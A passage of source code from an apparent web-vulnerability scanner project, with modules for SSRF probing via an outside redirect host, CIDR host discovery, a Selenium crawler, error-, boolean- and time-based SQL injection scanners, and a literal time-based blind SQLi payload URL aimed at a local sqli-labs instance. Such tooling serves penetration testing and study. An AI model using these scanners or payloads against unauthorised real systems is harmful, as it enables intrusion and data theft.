        self.tasks = [self.httpScan() for i in range(self.num)]
        self.loop.run_until_complete(asyncio.wait(self.tasks))
    def redirectScan(self):
        """Probe SSRF via the attacker-controlled 302 redirect page."""
        url = self.url.replace("*",self.remoteFile)
        #print(url)
        content = requests.get(url,headers = self.headers).text
        ratio = self.get_ratio(content)
        #print(content)
        if ratio < 0.3:
            sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]302 redirect is available!\n")
if __name__ == "__main__":
a = ssrfScan("http://192.168.8.181/ssrf/1.php?url=*",remoteFile = "http://39.105.115.217:8888/302.php")
a.url_in_queue()
#a.FileScan()
#a.dictScan()
a.start()
#a.redirectScan() | {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,648 | PanDa1G1/sunsecScanner | refs/heads/master | /sunTest/sunTest/pipelines.py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class SuntestPipeline(object):
    """Scrapy pipeline that appends every scraped URL to a text file."""
    def process_item(self, item, spider):
        result = dict(item)
        #print("[6]",result,sep="")
        # NOTE(review): hard-coded absolute Windows path -- breaks on any
        # other machine; should come from settings instead.
        with open('D:\\code\\python\\scan\\myscan\\database\\url.txt', 'a', encoding='utf-8') as file:
            url = result.get("scanUrl")
            #print("[7]",url,sep="")
            file.write(url+"\n")
        return item
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,649 | PanDa1G1/sunsecScanner | refs/heads/master | /src/Ipscan.py | import queue
import socket
import threading
import time
from src._print import _print
class Ipscan():
    """Multi-threaded live-host discovery over a /24, /16 or /8 CIDR range.

    A host answering a TCP connect on any common port is reported via the
    shared _print helper.
    """
    def __init__(self,url,thread_num = 100):
        self.host = url  # e.g. "192.168.1.0/24"
        self.thread_num = thread_num
        self.queue = queue.Queue()
        self.queue2 = queue.Queue()
        self._print = _print()
        # Ports probed per host; first open port marks the host as alive.
        self.port_list = [22,80,111,443,8080]
        self.threads = [threading.Thread(target = self.scan) for i in range(thread_num)]
    def ip_queue(self):
        """Expand the CIDR notation into individual IPs and enqueue them."""
        num = self.host.split('/')[1]
        ip_list = self.host.split('/')[0].split('.')
        if int(num) == 24:
            ip = ip_list[0] + '.' + ip_list[1] + '.' + ip_list[2]
            for i in range(256):
                real_ip = ip + '.' + str(i)
                self.queue.put(real_ip)
            self.length = self.queue.qsize()
        elif int(num) == 16:
            ip = ip_list[0] + '.' + ip_list[1]
            for i in range(256):
                for j in range(256):
                    real_ip = ip + '.' + str(i) + '.' + str(j)
                    self.queue.put(real_ip)
            self.length = self.queue.qsize()
        else:
            # Any other mask is treated as /8.
            ip = ip_list[0]
            for i in range(256):
                for j in range(256):
                    for k in range(256):
                        real_ip = ip + '.' + str(i) + '.' + str(j) + '.' + str(k)
                        self.queue.put(real_ip)
            self.length = self.queue.qsize()
    def out_queue(self,queue):
        """Pop the next IP from the given queue (blocking)."""
        return queue.get()
    def scan(self):
        """Worker: TCP-connect each queued IP on the common ports."""
        while not self.queue.empty():
            ip = self.out_queue(self.queue)
            for port in self.port_list:
                #print(ip,port)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                socket.setdefaulttimeout(0.1)
                res = s.connect_ex((ip, port))
                s.close()
                if res ==0:
                    # connect_ex returns 0 on success -> host is alive.
                    self._print.ip_res(ip)
                    #print(ip,port)
                    break
    def scan_start(self):
        """Launch all worker threads, wait for completion, report elapsed time."""
        self._print.print_info("Start Ipscan : %s" % time.strftime("%H:%M:%S"))
        time0 = time.time()
        for i in self.threads:
            i.start()
        for i in self.threads:
            i.join()
        time2 = time.time() - time0
        self._print.port_end(time2)
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,650 | PanDa1G1/sunsecScanner | refs/heads/master | /sunTest/sunTest/middlewares.py | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
from selenium.common.exceptions import NoAlertPresentException
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.action_chains import ActionChains
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.common.alert import Alert
from scrapy.http import HtmlResponse
import random
from selenium.common import exceptions
import sys
from colorama import Fore, Style, Back
class SuntestSpiderMiddleware(object):
    """Unmodified Scrapy spider-middleware template (pass-through hooks)."""
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the spider middleware does not modify the
    # passed objects.
    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s
    def process_spider_input(self, response, spider):
        # Called for each response that goes through the spider
        # middleware and into the spider.
        # Should return None or raise an exception.
        return None
    def process_spider_output(self, response, result, spider):
        # Called with the results returned from the Spider, after
        # it has processed the response.
        # Must return an iterable of Request, dict or Item objects.
        for i in result:
            yield i
    def process_spider_exception(self, response, exception, spider):
        # Called when a spider or process_spider_input() method
        # (from other spider middleware) raises an exception.
        # Should return either None or an iterable of Response, dict
        # or Item objects.
        pass
    def process_start_requests(self, start_requests, spider):
        # Called with the start requests of the spider, and works
        # similarly to the process_spider_output() method, except
        # that it doesn't have a response associated.
        # Must return only requests (not items).
        for r in start_requests:
            yield r
    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class SuntestDownloaderMiddleware(object):
    """Unmodified Scrapy downloader-middleware template (pass-through hooks)."""
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the downloader middleware does not modify the
    # passed objects.
    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s
    def process_request(self, request, spider):
        # Called for each request that goes through the downloader
        # middleware.
        # Must either:
        # - return None: continue processing this request
        # - or return a Response object
        # - or return a Request object
        # - or raise IgnoreRequest: process_exception() methods of
        #   installed downloader middleware will be called
        return None
    def process_response(self, request, response, spider):
        # Called with the response returned from the downloader.
        # Must either;
        # - return a Response object
        # - return a Request object
        # - or raise IgnoreRequest
        return response
    def process_exception(self, request, exception, spider):
        # Called when a download handler or a process_request()
        # (from other downloader middleware) raises an exception.
        # Must either:
        # - return None: continue processing this exception
        # - return a Response object: stops process_exception() chain
        # - return a Request object: stops process_exception() chain
        pass
    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class SeleniumMiddleWare:
    """Downloader middleware that renders pages in headless Firefox.

    For every request it also clicks each element carrying an ``onclick``
    handler (in a throw-away driver) to discover JavaScript-driven
    redirects, and appends the discovered URLs to the rendered body in a
    ``<div class='redir'>`` element so the spider can collect them.
    """

    def __init__(self):
        self.firefox_options = Options()
        self.firefox_options.headless = True
        # Long-lived browser reused for every request this middleware renders.
        self.browser = webdriver.Firefox(options=self.firefox_options)
        # Candidate User-Agent strings (currently collected but not applied).
        self.user_agents = [
            'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60Opera/8.0 (Windows NT 5.1; U; en)',
            'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50',
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11']

    def relocatedTest(self, attr, value, url):
        """Click the element where *attr* equals *value* on *url*.

        Returns the URL the click navigated to, or ``1`` when the page
        did not change or anything went wrong.
        """
        driver = None
        try:
            # Fresh driver per probe so the click cannot disturb self.browser.
            driver = webdriver.Firefox(options=self.firefox_options)
            driver.get(url)
            tag = driver.find_element_by_xpath('//*[@{}="{}"]'.format(attr, value))
            ActionChains(driver).move_to_element(tag).click(tag).perform()
            tempUrl = driver.current_url
            return 1 if tempUrl == url else tempUrl
        except Exception:
            # Any selenium failure counts as "no redirect".
            return 1
        finally:
            # BUG FIX: the original called driver.close() inside `except`
            # even when webdriver.Firefox() itself had raised, producing a
            # NameError on the unbound `driver`; guard and close here.
            if driver is not None:
                driver.close()

    def process_request(self, request, spider):
        """Render request.url in Firefox and return the DOM as a response."""
        self.browser.get(request.url)
        clickList = self.browser.find_elements_by_xpath("//*[@onclick]")
        # onmousemove handlers are collected but not yet probed.
        mouseList = self.browser.find_elements_by_xpath("//*[@onmousemove]")
        redirectUrls = []
        try:
            # BUG FIX: the original removed items from clickList while
            # iterating over it, silently skipping every element that
            # followed a redirecting one.
            for tag in clickList:
                attr = tag.get_attribute('onclick')
                result = self.relocatedTest("onclick", attr, request.url)
                if result != 1:
                    redirectUrls.append(result)
        except exceptions.MoveTargetOutOfBoundsException:
            print("error")
        result = self.browser.page_source + "<div class='redir'>{}</div>".format(",".join(redirectUrls))
        return HtmlResponse(url=request.url, body=result, status=200, request=request, encoding="utf8")
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,651 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/test/test1.py | # -*- coding: UTF-8 -*-
from difflib import SequenceMatcher
import requests
import sys
from urllib import parse
import re
import aiohttp
from aiohttp import ClientSession
import asyncio
import json
import time
# Manual smoke test: measure how long the time-based SQLi payload delays
# the response of a local sqli-labs instance.
url = "http://127.0.0.1/sqli-labs-master/Less-9/?id=1'and(sleep(if(!(select(aScii(suBstr('867546938',2,1))<>54)),5,1)))%23"
started = time.time()
response = requests.get(url)
elapsed = time.time() - started
print(elapsed)
50,652 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/error_inject.py | import asyncio
import aiohttp
from aiohttp import ClientSession
from urllib import parse
import re
import sys
import os
from colorama import Fore, Style, Back
from concurrent.futures import CancelledError
class error_inject():
    """Error-based SQL injection scanner.

    Each payload from ``sql_injection/payload/error.txt`` is sent to the
    target (``*`` marks the injection point in the URL or the POST data
    template); a payload is reported as usable when the response echoes
    the ``<digits>~~~!@~~~<digits>`` marker that error-based extraction
    leaks. Requests run concurrently via asyncio + aiohttp.
    """
    def __init__(self,url,method = "GET",headers = "sql_injection/payload/header.txt",payload_num = 10):
        self.url = url
        self.method = method
        # Template file: "Header: value" lines plus one "k=v&k2=*" data line.
        self.header_file = headers
        # Marker pattern leaked into the page by the error-based payloads.
        self.regx = r"[0-9]*~~~!@~~~[0-9]+"
        self.payload_file = "sql_injection/payload/error.txt"
        self.queue = asyncio.Queue()
        self.headers = {
            'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
            'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
            'Accept-Encoding': 'identity',
            'Keep-Alive': '300',
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
        }
        # Constant substituted for [REPLACE] in each payload template.
        self.flag_ = "886689288"
        self.loop = asyncio.get_event_loop()
        # Number of concurrent scan coroutines.
        self.num = 200
        self.tasks = []
        self.data = {}          # POST body built by prepare_post()
        self.postHeaders = {}   # POST headers built by prepare_post()
        self.flag = 0           # count of usable payloads found
        self.payload_final_num = payload_num   # stop after this many hits
        self.payload_temp_num = 0
    def payload_in_queue(self):
        """Load every payload line of the payload file into the queue."""
        with open(self.payload_file,"r") as f:
            for payload in f:
                self.queue.put_nowait(payload.strip("\n"))
    def prepare_post(self,payload):
        """Parse the template file into self.postHeaders / self.data.

        Lines containing ':' become headers; lines containing '&' become
        POST fields, with the field whose value is '*' replaced by
        *payload*. NOTE(review): both branches of the ``if not
        self.postHeaders`` test run identical code — looks like a
        leftover; verify before simplifying.
        """
        with open(self.header_file,"r") as f:
            for i in f:
                if not self.postHeaders:
                    if ":" in i.strip("\n"):
                        temp = i.strip("\n").split(":")
                        self.postHeaders[temp[0]] = temp[1].strip(" ")
                    if "&" in i.strip("\n"):
                        temp = i.strip("\n").split("&")
                        for data_ in temp:
                            data1 = data_.split("=")
                            if "*" in data1:
                                self.data[data1[0]] = payload
                            else:
                                self.data[data1[0]] = data1[1].strip(" ")
                else:
                    if ":" in i.strip("\n"):
                        temp = i.strip("\n").split(":")
                        self.postHeaders[temp[0]] = temp[1].strip(" ")
                    if "&" in i.strip("\n"):
                        temp = i.strip("\n").split("&")
                        for data_ in temp:
                            data1 = data_.split("=")
                            if "*" in data1:
                                self.data[data1[0]] = payload
                            else:
                                self.data[data1[0]] = data1[1].strip(" ")
    async def get_response(self,payload,session):
        """Send one payload; return the response body text.

        The caller's session is closed here. NOTE(review): the session
        is closed *before* the body is awaited — aiohttp may refuse to
        read a body on a closed session; confirm this works on the
        pinned aiohttp version.
        """
        if self.method == "GET":
            payload = parse.quote(payload.encode("utf-8"))
            url = self.url.replace("*",payload)
            s = await session.get(url,headers = self.headers)
            await session.close()
            return await s.text()
        else:
            self.prepare_post(payload)
            # Drop the template's stale Content-Length so aiohttp recomputes
            # it; raises KeyError when the header is absent from the template.
            self.postHeaders.pop("Content-Length")
            s = await session.post(self.url,headers = self.postHeaders,data = self.data)
            await session.close()
            return await s.text()
    async def sql_scan(self):
        """Worker coroutine: drain the payload queue, report marker hits."""
        while not self.queue.empty():
            session = ClientSession()
            try:
                payload_ = await self.queue.get()
                payload_ = payload_.replace("[REPLACE]",self.flag_)
                response = await self.get_response(payload_,session)
                # A raw MySQL syntax error means the payload broke the query
                # without leaking the marker — not usable.
                if "You have an error in your SQL syntax" in response:
                    continue
                if re.search(self.regx,response):
                    self.flag += 1
                    self.payload_temp_num += 1
                    sys.stdout.write(Fore.LIGHTGREEN_EX + "[*] available payload: {}\n".format(payload_))
                    if self.payload_temp_num == self.payload_final_num:
                        self.close()
            except:
                # Broad catch: network failures and the CancelledError raised
                # by close() are all treated as "skip this payload".
                await session.close()
                pass
    def start(self):
        """Run the scan; print a failure line when no payload worked."""
        try:
            self.payload_in_queue()
            self.tasks = [self.sql_scan() for i in range(self.num)]
            self.loop.run_until_complete(asyncio.wait(self.tasks))
        except CancelledError:
            pass
        if self.flag == 0:
            sys.stdout.write(Fore.LIGHTRED_EX + "[-] can't error inject\n")
    def close(self):
        """Cancel every outstanding task once enough payloads were found.

        NOTE(review): asyncio.Task.all_tasks() was removed in Python 3.9
        (use asyncio.all_tasks()) — confirm the target interpreter.
        """
        for task in asyncio.Task.all_tasks():
            task.cancel()
'''if __name__ == "__main__":
a = error_inject("http://localhost/sqli-labs-master/Less-14/?id=*",method="POST")
a.start()
#a.prepare_post("sunsec")
#print(a.postHeaders)
#print(a.data)''' | {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,653 | PanDa1G1/sunsecScanner | refs/heads/master | /sunTest/sunTest/spiders/quotes.py | # -*- coding: utf-8 -*-
import scrapy
import re
from sunTest.items import SuntestItem
from bloom_filter import BloomFilter
class QuotesSpider(scrapy.Spider):
    """Crawler that harvests scan-candidate URLs.

    Collects links, resource URLs, GET-form templates and the
    JS-redirect URLs injected by the Selenium middleware, normalises
    each query string to a "mode" (values replaced by '*'), de-duplicates
    modes via a Bloom filter, then yields items and follow-up requests.
    """
    name = 'quotes'
    allowed_domains = []
    start_urls = ['http://127.0.0.1/php/1.php']

    def __init__(self):
        self.spiderUlrs = []              # absolute URLs still awaiting a crawl
        self.whiteList = ["php", "asp"]   # only these extensions are scanned
        # De-duplicates URL modes across the whole crawl.
        self.bloom = BloomFilter(max_elements=1000000, error_rate=0.1)

    def getFormList(self, response):
        """Turn every GET form on the page into a URL template in which
        each input value is replaced by the '*' injection marker."""
        result = []
        for form in response.css("form"):
            # NOTE(review): assumes every form carries action/method
            # attributes; a missing one makes .get() return None — confirm.
            tempUrl = form.css("::attr(action)").get() + "?"
            method = form.css("::attr(method)").get()
            names = form.css("input::attr(name)").getall()
            if method.lower() == "get":
                for name in names:
                    if name.lower() == "submit":
                        tempUrl += "submit=submit"
                    else:
                        tempUrl = tempUrl + name + "=*&"
                result.append(tempUrl.strip("&"))
        return result

    def getMode(self, url):
        """Normalise *url*: every query-string value becomes '*'."""
        parts = url.split("?")
        if len(parts) == 1:
            return url
        return parts[0] + "?" + re.sub("=[a-zA-Z0-9_-]+", "=*", parts[1])

    def parse(self, response):
        """Extract candidate URLs, de-duplicate them and follow them."""
        items = SuntestItem()
        hrefList = response.css("a::attr(href)").getall()
        linkList = response.css("link::attr(href)").getall()
        srcList = [i.css("*::attr(src)").get() for i in response.css("[src]")]
        formList = self.getFormList(response)
        redirList = []
        # Redirect URLs planted by the Selenium middleware, comma-joined.
        redirtext = response.css(".redir::text").get()
        if redirtext:
            redirList = redirtext.split(",")
        for url in hrefList + srcList + formList + redirList + linkList:
            if not re.match("http", url):
                finalUrl = response.urljoin(url)
                urlmode = response.urljoin(self.getMode(url))
            else:
                finalUrl = url
                urlmode = self.getMode(url)
            if urlmode not in self.bloom:
                # Accept ".php" style endings as well as "x.php?..." URLs.
                if finalUrl.split(".")[-1] in self.whiteList or finalUrl.split("?")[0].split("/")[-1].split(".")[-1] in self.whiteList:
                    self.bloom.add(urlmode)
                    items["scanUrl"] = urlmode
                    self.spiderUlrs.append(finalUrl)
                    yield items
        # BUG FIX: the original removed entries from spiderUlrs while
        # iterating over it, which skipped every other pending URL.
        pending, self.spiderUlrs = self.spiderUlrs, []
        for url in pending:
            yield scrapy.Request(url=url, callback=self.parse)
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,654 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/Boolen_scan.py | import requests
from difflib import SequenceMatcher
from colorama import Fore, Style, Back
from urllib import parse
import threading
import queue
import sys
class Boolen_Scan():
    """Boolean-based blind SQL injection scanner.

    For each payload it fetches a "true" page and the "false" twin
    (digit 2 swapped for 3) and flags the payload when the two pages
    differ — via the user-supplied string/not_string markers, or via
    fuzzy page similarity when no marker is given. '*' marks the
    injection point in the URL (GET) or in *file*'s data template (POST).
    """
    def __init__(self, url, method="GET", file="sql_injection/payload/header.txt", string="", not_string="", thread_num=50, payload_num=10):
        self.url = url
        self.method = method
        self.header_file = file
        self.string = string            # text expected only on the TRUE page
        self.not_string = not_string    # text expected only on the FALSE page
        self.paylaodFile = "sql_injection/payload/Boolen.txt"
        self.headers = {
            'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
            'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
            'Accept-Encoding': 'identity',
            'Keep-Alive': '300',
            'Connection': 'close',
            'Cache-Control': 'max-age=0',
        }
        self.queue_ = queue.Queue()
        self.thread_num = thread_num
        self.flag = 0                       # usable payloads found so far
        self.data = {}                      # POST body built by prepare_post()
        self.postHeaders = {}               # POST headers built by prepare_post()
        self.payload_final_num = payload_num   # stop a worker after this many hits
        self.payload_temp_num = 0

    def get_page(self, payload):
        """Return the decoded response body for one payload."""
        if self.method == "GET":
            quoted = parse.quote(payload.encode("utf-8"))
            url = self.url.replace("*", quoted)
            return requests.get(url, headers=self.headers).content.decode("utf-8")
        self.prepare_post(payload)
        return requests.post(self.url, headers=self.postHeaders, data=self.data).content.decode("utf-8")

    def prepare_post(self, payload):
        """Parse the header/data template file.

        Lines with ':' become POST headers; lines with '&' become the
        POST body, substituting *payload* for any field whose value is
        '*'. (The original duplicated this logic in two byte-identical
        branches; collapsed here. split(':', 1) also fixes headers whose
        value itself contains a colon, e.g. Referer URLs.)
        """
        with open(self.header_file, "r") as f:
            for raw in f:
                line = raw.strip("\n")
                if ":" in line:
                    key, value = line.split(":", 1)
                    self.postHeaders[key] = value.strip(" ")
                if "&" in line:
                    for pair in line.split("&"):
                        parts = pair.split("=")
                        if "*" in parts:
                            self.data[parts[0]] = payload
                        else:
                            self.data[parts[0]] = parts[1].strip(" ")

    def scan(self):
        """Worker: compare TRUE/FALSE pages for each queued payload."""
        while not self.queue_.empty():
            TruePayload = self.queue_.get()
            TruePage = self.get_page(TruePayload)
            FalsePayload = TruePayload.replace("2", "3")
            FalsePage = self.get_page(FalsePayload)
            if self.string:
                hit = self.string in TruePage and TruePage != FalsePage
            elif self.not_string:
                hit = self.not_string in FalsePage and TruePage != FalsePage
            else:
                # No marker given: fall back to fuzzy page comparison.
                hit = self.get_ratio(FalsePayload, TruePage) < 0.994
            if hit:
                self.flag += 1
                self.payload_temp_num += 1
                sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]available payload {}\n".format(TruePayload))
                # >= (not ==) so concurrent increments cannot overshoot the
                # quota and keep the worker running forever.
                if self.payload_temp_num >= self.payload_final_num:
                    sys.stdout.write(Fore.LIGHTYELLOW_EX + "[*]scan finished\n")
                    # SystemExit only terminates this worker thread.
                    sys.exit(0)

    def get_ratio(self, payload, res_text):
        """Similarity (0..1) between *payload*'s page and *res_text*."""
        seqm = SequenceMatcher()
        seqm.set_seq1(self.get_page(payload))
        seqm.set_seq2(res_text)
        return seqm.ratio()

    def payload_in_queue(self):
        """Load every payload line of the payload file into the queue."""
        with open(self.paylaodFile, "r") as f:
            for payload in f:
                self.queue_.put(payload.split("\n")[0])

    def start(self):
        """Run thread_num workers; report failure when nothing hit."""
        self.payload_in_queue()
        thread_ = []
        for i in range(self.thread_num):
            # BUG FIX: the original passed target=self.scan(), which ran the
            # whole scan serially in the main thread and handed each Thread
            # the call's None result — the threads did nothing.
            t = threading.Thread(target=self.scan)
            thread_.append(t)
            t.start()
        for t in thread_:
            t.join()
        if not self.flag:
            sys.stdout.write(Fore.LIGHTRED_EX + "[-]can't Boolen inject\n")
if __name__ == "__main__":
    # Manual smoke test against a local sqli-labs instance (requires the
    # vulnerable app to be running; not executed on import).
    a = Boolen_Scan("http://127.0.0.1/sqli-labs-master/Less-15/?id=*",thread_num = 100,method="POST")
    a.start()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,655 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/time_scan.py | import requests
from colorama import Fore, Style, Back
from urllib import parse
import threading
import queue
import time
import sys
class Time_scan():
    """Time-based blind SQL injection scanner.

    Sends payloads containing ``sleep([wait_time])`` and flags a payload
    as usable when the response takes roughly *wait_time* seconds.
    '*' marks the injection point in the URL (GET) or in *file*'s data
    template (POST).
    """
    def __init__(self, url, method="GET", file="sql_injection/payload/header.txt", thread_num=50, payload_num=10, wait_time=5):
        self.url = url
        self.method = method
        self.header_file = file
        self.paylaodFile = "sql_injection/payload/time.txt"
        self.headers = {
            'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
            'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
            'Accept-Encoding': 'identity',
            'Keep-Alive': '300',
            'Connection': 'close',
            'Cache-Control': 'max-age=0',
        }
        self.queue_ = queue.Queue()
        self.thread_num = thread_num
        self.flag = 0                       # usable payloads found so far
        self.data = {}                      # POST body built by prepare_post()
        self.postHeaders = {}               # POST headers built by prepare_post()
        self.payload_final_num = payload_num   # stop a worker after this many hits
        self.payload_temp_num = 0
        self.wait_time = wait_time          # seconds the payload should sleep

    def payload_in_queue(self):
        """Load every payload line of the payload file into the queue."""
        with open(self.paylaodFile, "r") as f:
            for payload in f:
                self.queue_.put(payload.split("\n")[0])

    def get_time(self, payload):
        """Return the wall-clock seconds one request took."""
        if self.method == "GET":
            quoted = parse.quote(payload.encode("utf-8"))
            url = self.url.replace("*", quoted)
            started = time.time()
            requests.get(url, headers=self.headers)
            return time.time() - started
        self.prepare_post(payload)
        started = time.time()
        requests.post(self.url, headers=self.postHeaders, data=self.data)
        return time.time() - started

    def prepare_post(self, payload):
        """Parse the header/data template file.

        Lines with ':' become POST headers; lines with '&' become the
        POST body, substituting *payload* for any field whose value is
        '*'. (The original duplicated this logic in two byte-identical
        branches; collapsed here. split(':', 1) also fixes headers whose
        value itself contains a colon.)
        """
        with open(self.header_file, "r") as f:
            for raw in f:
                line = raw.strip("\n")
                if ":" in line:
                    key, value = line.split(":", 1)
                    self.postHeaders[key] = value.strip(" ")
                if "&" in line:
                    for pair in line.split("&"):
                        parts = pair.split("=")
                        if "*" in parts:
                            self.data[parts[0]] = payload
                        else:
                            self.data[parts[0]] = parts[1].strip(" ")

    def scan(self):
        """Worker: time each queued payload and report slow responses."""
        while not self.queue_.empty():
            payload = self.queue_.get().replace('[wait_time]', str(self.wait_time))
            time_ = self.get_time(payload)
            # wait_time - 1 leaves a 1 s margin; assumes normal latency is
            # well below that — tune wait_time for slow targets.
            if time_ > self.wait_time - 1:
                self.payload_temp_num += 1
                self.flag += 1
                sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]available payload {}\n".format(payload))
                # >= (not ==) so concurrent increments cannot overshoot the
                # quota; SystemExit only terminates this worker thread.
                if self.payload_temp_num >= self.payload_final_num:
                    sys.stdout.write(Fore.LIGHTYELLOW_EX + "[*]scan finished\n")
                    sys.exit(0)

    def start(self):
        """Run thread_num workers; report failure when nothing hit."""
        self.payload_in_queue()
        thread_ = []
        for i in range(self.thread_num):
            # BUG FIX: the original passed target=self.scan(), which ran the
            # whole scan serially in the main thread and handed each Thread
            # the call's None result — the threads did nothing.
            t = threading.Thread(target=self.scan)
            thread_.append(t)
            t.start()
        for t in thread_:
            t.join()
        if not self.flag:
            # BUG FIX: the original printed "can't Boolen inject" here —
            # a copy-paste slip from the boolean scanner.
            sys.stdout.write(Fore.LIGHTRED_EX + "[-]can't time inject\n")
if __name__ == "__main__":
    # Manual smoke test against a local sqli-labs time-blind page
    # (requires the vulnerable app to be running; not executed on import).
    a = Time_scan("http://127.0.0.1/sqli-labs-master/Less-9/?id=*")
    a.start()
50,656 | PanDa1G1/sunsecScanner | refs/heads/master | /src/fuzz.py | import asyncio
from aiohttp import ClientSession
import requests
import hashlib
import aiohttp
from src._print import _print
import time
import io
from difflib import SequenceMatcher
class Fuzz(set):
    """Asynchronous URL-parameter fuzzer.

    For ``.../page?param=fuzz`` it brute-forces parameter *names* from
    directroy/123.txt; otherwise it fuzzes *values* for the given
    parameter from directroy/pathtotest_huge.txt. A candidate is printed
    when the response differs enough from the baseline page.
    NOTE(review): inheriting from ``set`` appears accidental — the class
    never uses set behaviour; confirm before removing.
    """
    def __init__(self,url):
        # Base URL without its query string.
        self.url = url.split('?')[0]
        self.queue1 = asyncio.Queue()   # candidate values
        self.queue2 = asyncio.Queue()   # currently unused
        self.loop = asyncio.get_event_loop()
        self.num = 100                  # concurrent worker coroutines
        self.list = []                  # parameter names (name-fuzzing mode)
        self.headers = {
            'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
            'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
            'Accept-Encoding': 'identity',
            'Keep-Alive': '300',
            'Connection': 'keep-alive',
